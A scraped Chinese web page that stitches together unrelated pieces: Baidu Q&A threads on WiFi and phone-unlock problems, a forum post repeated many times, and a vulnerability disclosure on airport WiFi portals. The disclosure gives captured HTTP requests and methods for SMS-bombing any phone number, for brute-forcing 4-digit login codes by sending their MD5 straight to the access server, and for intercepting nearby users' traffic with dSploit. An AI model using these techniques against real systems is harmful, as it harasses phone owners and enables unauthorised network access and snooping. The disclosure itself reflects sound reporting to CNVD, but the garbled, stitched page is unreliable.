wifiSAST一7052的解锁wifi密码解锁器

改了WiFi密码连接上了但是上不了网,怎么办,急!!_百度知道
改了WiFi密码连接上了但是上不了网,怎么办,急!!
是电信的,用电脑改的,改了后就上不了网
除非你电脑也用WIFI连接的,如果 是的话断开原来的连接你重启一下路由器看看,重新输入新密码连接一次就行了,如果你只是指WIFI密码是不会有影响的
路由器我重启过,电脑我也重启过,都不行!
电脑是有线连接还是无线连接?有线的话,你再连接进路由器里面,按设置向导重新设置一次就好了呀,不过要输入宽带帐号和拔号密码。
还是不行!
打开IE选项,在连接那里,有个局域网设置,你把前面的那个勾打一下
没有看到,电脑是XP的
没有看到,电脑是XP的
没有看到,电脑是XP的
右键点击你的IE,属性-连接-局域网设置-自动检测(打勾)
弄过了啊。还是不行
用针,笔之类的东西,顶住路由器后面的那个小孔,大概五秒,恢复出厂设置,重新设置一次路由器.
试过了!对了,DNS配置是什么?
DNS服务器是指“域名解析服务器”,而域名就是我们通常所说的“网址”。 这里有,你看了就明白了。但应该不是DNS的问题呀,你不是说手机可以连接上网络吗。
手机可以连接上,但是上不了网
你看一下是不是自动获取IP地址
其他类似问题
为您推荐:
wifi的相关知识
其他3条回答
你可以直接打电话咨询电信客服简单又快!
你最后咋弄好的?
是电信光纤吗
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁查看: 6760|回复: 1
经验3412 魅力60 UID1183795帖子主题精华0金钱1830114 注册时间最后登录
阅读权限120UID1183795帖子主题精华0金钱1830114 注册时间最后登录
本帖最后由 踏雪飞鸿1973 于
17:04 编辑
SAST 先科YC 100格机+解锁+恢复出厂设置,亲测,有图!100%管用才发来哦
今天又接了一个,结果是砖头机。开机一闪就没亮光了。没辙,只好找客服要来了原厂的救砖专用刷机线刷包!!原厂的救砖包下载具体见帖子
这么多下载的啊,用好了也不给我顶一下啊
接了个开机定屏进不了系统的机子,想上论坛找个格机的资料进行格机,双清下恢复出厂设置的。结果找了 好些个资料都不能用:根本就进不去格机模式!没办法,打发走顾客后自己慢慢摸索,呵呵,经过努力,终于搞定了!!现在奉献出来,亲测搞好了机子才发上来的哦,100%包票能用哦,除非你的机子硬件问题哦。格机解锁+恢复出厂设置,两分钟全部搞定哦。打包票!!
接了个开机定屏进不了系统的机子,想上论坛找个格机的资料进行格机,双清下恢复出厂设置的。结果找了 好些个资料都不能用:根本就进不去格机模式!没办法,打发走顾客后自己慢慢摸索,呵呵,经过努力,终于搞定了!!现在奉献出来,亲测搞好了机子才发上来的哦,100%包票能用哦,除非你的机子硬件问题哦。格机解锁+恢复出厂设置,两分钟全部搞定哦。打包票!!
接了个开机定屏进不了系统的机子,想上论坛找个格机的资料进行格机,双清下恢复出厂设置的。结果找了 好些个资料都不能用:根本就进不去格机模式!没办法,打发走顾客后自己慢慢摸索,呵呵,经过努力,终于搞定了!!现在奉献出来,亲测搞好了机子才发上来的哦,100%包票能用哦,除非你的机子硬件问题哦。格机解锁+恢复出厂设置,两分钟全部搞定哦。打包票!!
接了个开机定屏进不了系统的机子,想上论坛找个格机的资料进行格机,双清下恢复出厂设置的。结果找了 好些个资料都不能用:根本就进不去格机模式!没办法,打发走顾客后自己慢慢摸索,呵呵,经过努力,终于搞定了!!现在奉献出来,亲测搞好了机子才发上来的哦,100%包票能用哦,除非你的机子硬件问题哦。格机解锁+恢复出厂设置,两分钟全部搞定哦。打包票!!
接了个开机定屏进不了系统的机子,想上论坛找个格机的资料进行格机,双清下恢复出厂设置的。结果找了 好些个资料都不能用:根本就进不去格机模式!没办法,打发走顾客后自己慢慢摸索,呵呵,经过努力,终于搞定了!!现在奉献出来,亲测搞好了机子才发上来的哦,100%包票能用哦,除非你的机子硬件问题哦。格机解锁+恢复出厂设置,两分钟全部搞定哦。打包票!!
接了个开机定屏进不了系统的机子,想上论坛找个格机的资料进行格机,双清下恢复出厂设置的。结果找了 好些个资料都不能用:根本就进不去格机模式!没办法,打发走顾客后自己慢慢摸索,呵呵,经过努力,终于搞定了!!现在奉献出来,亲测搞好了机子才发上来的哦,100%包票能用哦,除非你的机子硬件问题哦。格机解锁+恢复出厂设置,两分钟全部搞定哦。打包票!!
接了个开机定屏进不了系统的机子,想上论坛找个格机的资料进行格机,双清下恢复出厂设置的。结果找了 好些个资料都不能用:根本就进不去格机模式!没办法,打发走顾客后自己慢慢摸索,呵呵,经过努力,终于搞定了!!现在奉献出来,亲测搞好了机子才发上来的哦,100%包票能用哦,除非你的机子硬件问题哦。格机解锁+恢复出厂设置,两分钟全部搞定哦。打包票!!
接了个开机定屏进不了系统的机子,想上论坛找个格机的资料进行格机,双清下恢复出厂设置的。结果找了 好些个资料都不能用:根本就进不去格机模式!没办法,打发走顾客后自己慢慢摸索,呵呵,经过努力,终于搞定了!!现在奉献出来,亲测搞好了机子才发上来的哦,100%包票能用哦,除非你的机子硬件问题哦。格机解锁+恢复出厂设置,两分钟全部搞定哦。打包票!!
接了个开机定屏进不了系统的机子,想上论坛找个格机的资料进行格机,双清下恢复出厂设置的。结果找了 好些个资料都不能用:根本就进不去格机模式!没办法,打发走顾客后自己慢慢摸索,呵呵,经过努力,终于搞定了!!现在奉献出来,亲测搞好了机子才发上来的哦,100%包票能用哦,除非你的机子硬件问题哦。格机解锁+恢复出厂设置,两分钟全部搞定哦。打包票!!
接了个开机定屏进不了系统的机子,想上论坛找个格机的资料进行格机,双清下恢复出厂设置的。结果找了 好些个资料都不能用:根本就进不去格机模式!没办法,打发走顾客后自己慢慢摸索,呵呵,经过努力,终于搞定了!!现在奉献出来,亲测搞好了机子才发上来的哦,100%包票能用哦,除非你的机子硬件问题哦。格机解锁+恢复出厂设置,两分钟全部搞定哦。打包票!!
接了个开机定屏进不了系统的机子,想上论坛找个格机的资料进行格机,双清下恢复出厂设置的。结果找了 好些个资料都不能用:根本就进不去格机模式!没办法,打发走顾客后自己慢慢摸索,呵呵,经过努力,终于搞定了!!现在奉献出来,亲测搞好了机子才发上来的哦,100%包票能用哦,除非你的机子硬件问题哦。格机解锁+恢复出厂设置,两分钟全部搞定哦。打包票!!
接了个开机定屏进不了系统的机子,想上论坛找个格机的资料进行格机,双清下恢复出厂设置的。结果找了 好些个资料都不能用:根本就进不去格机模式!没办法,打发走顾客后自己慢慢摸索,呵呵,经过努力,终于搞定了!!现在奉献出来,亲测搞好了机子才发上来的哦,100%包票能用哦,除非你的机子硬件问题哦。格机解锁+恢复出厂设置,两分钟全部搞定哦。打包票!!
接了个开机定屏进不了系统的机子,想上论坛找个格机的资料进行格机,双清下恢复出厂设置的。结果找了 好些个资料都不能用:根本就进不去格机模式!没办法,打发走顾客后自己慢慢摸索,呵呵,经过努力,终于搞定了!!现在奉献出来,亲测搞好了机子才发上来的哦,100%包票能用哦,除非你的机子硬件问题哦。格机解锁+恢复出厂设置,两分钟全部搞定哦。打包票!!
接了个开机定屏进不了系统的机子,想上论坛找个格机的资料进行格机,双清下恢复出厂设置的。结果找了 好些个资料都不能用:根本就进不去格机模式!没办法,打发走顾客后自己慢慢摸索,呵呵,经过努力,终于搞定了!!现在奉献出来,亲测搞好了机子才发上来的哦,100%包票能用哦,除非你的机子硬件问题哦。格机解锁+恢复出厂设置,两分钟全部搞定哦。打包票!!
接了个开机定屏进不了系统的机子,想上论坛找个格机的资料进行格机,双清下恢复出厂设置的。结果找了 好些个资料都不能用:根本就进不去格机模式!没办法,打发走顾客后自己慢慢摸索,呵呵,经过努力,终于搞定了!!现在奉献出来,亲测搞好了机子才发上来的哦,100%包票能用哦,除非你的机子硬件问题哦。格机解锁+恢复出厂设置,两分钟全部搞定哦。打包票!!
接了个开机定屏进不了系统的机子,想上论坛找个格机的资料进行格机,双清下恢复出厂设置的。结果找了 好些个资料都不能用:根本就进不去格机模式!没办法,打发走顾客后自己慢慢摸索,呵呵,经过努力,终于搞定了!!现在奉献出来,亲测搞好了机子才发上来的哦,100%包票能用哦,除非你的机子硬件问题哦。格机解锁+恢复出厂设置,两分钟全部搞定哦。打包票!!
附件: 你需要才可以下载或查看附件。没有帐号?
经验866 魅力0 UID1993947帖子主题精华0金钱20263 注册时间最后登录
阅读权限120UID1993947帖子主题精华0金钱20263 注册时间最后登录
OK个鸟,个个资料都一样而且都是不行的,
难道东海这款机就没有一个好的资料吗?
Powered bysast先科手机锁密码忘记了怎么解锁?_百度知道
sast先科手机锁密码忘记了怎么解锁?
如果手机是开机状态。⒌)刷完,抠下电池再装上,直到出现Recovery界面为止!到此刷机结束,然后复制到SD卡的根目录,但是不要改动zip包里的文件),也就是进度条走完后的界面,然后选择rom刷机文件,要耐心等,按电源键确定。⒊)选中 wipe data&#47,先按住音量+键不放:⒈)将从网上下载的对应手机刷机rom, 再选yes按电源键确定开始刷。)⒋)选install zip from sdcard 按电源键确定,音量上下键移动),在关机情况下,直到出现Recovery界面为止:方法一。方法二,选中yes后确定:如果以上方法无法进入,不解压;然后再选中wipe cache partition按确定。recovery刷机(电源键确定,然后再选 choose zip from sdcard按电源键确定。(这就是传说中的双wipe。第一次重启时间长,那么再开机,返回到recovery主界面,然后通过特殊按键组合进入recovery界面,然后再长按电源开机键,请先关机,zip包里必须有META-INF这个文件夹的才是刷机包。这时选reboot system now按电源键手机重启。⒉)彻底关机(最好关机后抠一下电池),rom为zip格式(可以打开验证一下。复制完成后可以断开手机和电脑的连接,同时按住电源键 + 小房子(Home)键,步骤如下,了解刷机的朋友一定听过如果能进入recovery,就刷机;进入Recovery模式方法;factory reset按电源键确定,再用选中yes按确定
来自团队:
其他类似问题
为您推荐:
手机锁的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁分享漏洞:
披露状态:
: 细节已通知厂商并且等待厂商处理中
: 厂商已经确认,细节仅向厂商公开
: 细节向核心白帽子及相关领域专家公开
: 细节向普通白帽子公开
: 细节向实习白帽子公开
: 细节向公众公开
简要描述:
普通机场WIFI系统。迈外迪和i-shanghai存在短信轰炸漏洞、web portal登陆绕过漏洞
详细说明:
连接wifi: i-shanghai
访问任意地址。此时请求会重定向到Web认证服务器。此时服务器要求提交用户手机号码,作为身份认证凭证访问网络。提交可用手机号后,我们收到身份认证消息。
4. 截取获取验证码数据包,我们得到模拟获取验证码数据包:
code 区域POST /indivi_getpwd HTTP/1.1
Host: **.**.**.**
Connection: keep-alive
Content-Length: 573
Origin: https://**.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0. Safari/537.36
Content-Type: application/x-www-form-charset=UTF-8
Accept: */*
Referer: https://**.**.**.**/style/ish_fx/index.jsp?paramStr=COqXYOzD8pv6cqCP2xM%2F1QXHeeGfBeBePXZBiPFZG%2Fs4%2FqxL5rmdARSgMWIbfw5IxISE2dASuPU7%0ALBGgOEqOcXWwcvjy5PelSIeCqYTPiPEtTbivgnf1NpCV0L7FUsuJQj4a03ik04ZJkr%2Fsj8AXGT8c%0AXhy222MHStY0YoqR%2Bt7rEqrIdMIX6P8Qsl%2Ffkjb1445ppt7UKPfcyxvL0oGhbhS%2ByudOD%2BsmEpNV%0ApXa6Mo%2Fm0CDnd3xyVj95FoaSd202Ic7wojsRdkVHA69kHhdiS6wjhMSaANO0FNPST%2Bt1q8noQeIt%0A773Z%2BQsFOQYyPhvzj9LDPZxkzeX6kIXDl4FHFEIvutmGGJt1tdM9W1XHgWp0JrdmjT1F2EJRy8mg%0AZWm4NKCrlgf5E%2FbyU9CZTnXao1BIu0pq3tK6V0PHWMMydsmL9c4XzChDQm%2FoEtUy1FUc
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,q=0.8,q=0.6
Cookie: JSESSIONID=6C0CD643DFA1B49FFCDD78D
paramStr=COqXYOzD8pv6cqCP2xM%2F1QXHeeGfBeBePXZBiPFZG%2Fs4%2FqxL5rmdARSgMWIbfw5IxISE2dASuPU7%0ALBGgOEqOcS4DxIRAJLjKoB0IJRWUVKlbRmzBMEqYgXm4emZ9XuDvXl79xKG57CHGwZuRa3qI2W35%0AWY%2Bg6NgsdtP%2FyiwuvU4HYnN9dc3IHn9hG74tz%2BfR7xWaqkwnSFNEEPyj%2FOsrGFrO7X8C%2BPDAwrTb%0A8cCFR4iiKWfLeV1jLJRVAAmghwKtg01VZ%2F1EuzxGmVUSOuXN%2FtMBNmHN%2BWA4%2Bud51uGJ0HK535R3%0AAe05gr1EancrK6CmesbGFCo63UuyDwnw5rN3sv4hQbvTT7r7vWEu3mN2cMDfegLpMgq6dNHLWrEP%0Ahl0HqIfQnyhJBj9r%2F6uY8Imw2QDbaIhXfqLfHkM1bkh0gR6qP8DPQIoV2LXTPVtVx4FqWImQK6rY%0AR%2Bb15ff9Tni4bQ%3D%3D&userName=138******&t=0.7667
这里username是我们要轰炸的手机账号。当我们重复对该数据包进行发送的时候,我们会发现服务器做了限制。原因在于参数t,是一个随机数,我们这里需要随机随着次数和时间更新t。实现短信轰炸功能。
1分钟之内目标手机将收到上百条短信信息
同样的,我们连接另一个wifi:public free wifi,我们同样发现,该系统具有短信轰炸漏洞。
2. 通过一次正常的登陆过程,我们对网络数据进行抓包。可以发现请求验证码数据包:
code 区域POST /portal/ajaxregbymobile HTTP/1.1
Host: **.**.**.**:8887
Connection: keep-alive
Content-Length: 27
Accept: text/plain, */*; q=0.01
Origin: http://**.**.**.**:8887
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0. Safari/537.36
Content-Type: application/x-www-form- charset=UTF-8
Referer: http://**.**.**.**:8887/portal?cmd=login&mac=74:e5:43:06:48:5a&ip=**.**.**.**&essid=FREE-AIRPORT-WiFi&url=http%3A%2F%2Fwww%2Ebaidu%2Ecom%2Findex%2Ephp%3Ftn%3DF14%5Fpg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,q=0.8,q=0.6
Cookie: PHPSESSID=bqb8bamo2l4vcmehfe4mdiq2n5
mobile=138*****&type=sms
参数mobile是我们轰炸对象。此处我们发现,与i-shanghai不同。Free public wifi的系统甚至并未进行任何校验。这样我们只需简单重复发送数据包,就可实现信息轰炸。
疯狂重复发送就可。
绕过Web Portal漏洞 :链接free public wifi
连接网络后我们打开浏览器,访问任意地址。此时请求会重定向到Web认证服务器。此时服务器要求提交用户手机号码,作为身份认证凭证访问网络。提交可用手机号后,我们收到身份认证消息。
4. 抓取登陆过程数据包,我们得到以下内容:
code 区域POST /portal/ajaxlogin HTTP/1.1
Host: **.**.**.**:8887
Connection: keep-alive
Content-Length: 30
Accept: text/plain, */*; q=0.01
Origin: http://**.**.**.**:8887
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0. Safari/537.36
Content-Type: application/x-www-form- charset=UTF-8
Referer: http://**.**.**.**:8887/portal?cmd=login&mac=74:e5:43:06:48:5a&ip=**.**.**.**&essid=FREE-AIRPORT-WiFi&url=http%3A%2F%2Fwww%2Ebaidu%2Ecom%2Findex%2Ephp%3Ftn%3DF14%5Fpg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,q=0.8,q=0.6
Cookie: PHPSESSID=bqb8bamo2l4vcmehfe4mdiq2n5
user=138******&password=0556
这里如果我们失败三次登陆之后。系统会对某手机号码禁止登陆。这个时候,就无法进行简单的密码穷举。
实际上还是存在漏洞的。我们通过分析数据包发现。上面存在错误次数限制的登陆,实际上并不是真正的登陆地址。截取正确登陆数据包我们发现:
Portal Server验证密码通过后。会返回一串字符串: 3e33b970f21d2fcd2c6e4
这串字符串,实际上就是密码的md5值(这里二次测试,密钥是4051)。然后浏览器会使用该md5值,直接与BAS服务器进行交互登陆。
具体登陆数据包如下:
code 区域POST /login.html HTTP/1.1
Host: **.**.**.**
Connection: keep-alive
Content-Length: 117
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/q=0.9,image/webp,*/*;q=0.8
Origin: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0. Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: **.**.**.**/s?t=haupka
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,q=0.8,q=0.6
buttonClicked=4&redirect_url=&err_flag=0&username=138****&password=3e33b970f21d2fcd2c6e4&Submit=Submit
这里是一种充满风险的架构。用户本质上是绕过了Portal Server服务器与BAS直接进行登陆认证。而这里,登陆认证并没有加入一些防暴力破解的逻辑。
6. 那么因为本质上,密码还是4为数字。我们无法向Portal Server 进行密码认证。但是我们可以直接与BAS直接进行沟通,猜解密码。
具体的,我们通过自动化程序。生成4位数字的md5值,替代password进行穷举登陆。
我们使用一台android手机。安装dspolit,配置好工作环境后。连接SSID为i-shanghai的网络:
可以看到附近上网用户:
我们可以进行信息窃取:
同样的,free public wifi这个SSID也同样存在这个问题:
漏洞证明:
修复方案:
版权声明:转载请注明来源 @
厂商回应:
危害等级:高
漏洞Rank:13
确认时间: 15:19
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT向民航行业测评中心通报,由其后续协调网站管理单位处置.
最新状态:
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
真是走到哪日到哪
登录后才能发表评论,请先抱歉,指定的主题不存在或已被删除或正在被审核
Powered by}

我要回帖

更多关于 苹果密码忘了怎么解锁 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信